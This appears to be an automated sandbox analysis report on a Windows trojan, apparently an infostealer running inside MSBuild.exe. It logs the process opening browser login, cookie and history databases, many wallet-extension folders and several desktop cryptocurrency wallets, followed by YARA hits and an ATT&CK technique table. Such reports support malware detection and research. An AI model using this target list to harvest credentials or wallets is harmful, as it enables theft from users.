                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5316, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5316, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.3f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEAA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CEAA0C0
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    21
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    Boot or Logon Initialization Scripts311
                    Process Injection
                    11
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    File and Directory Discovery
                    Remote Desktop Protocol31
                    Data from Local System
                    2
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information
                    Security Account Manager23
                    System Information Discovery
                    SMB/Windows Admin Shares1
                    Screen Capture
                    113
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    PowerShell
                    Login HookLogin Hook1
                    Timestomp
                    NTDS121
                    Security Software Discovery
                    Distributed Component Object Model2
                    Clipboard Data
                    Protocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials131
                    Virtualization/Sandbox Evasion
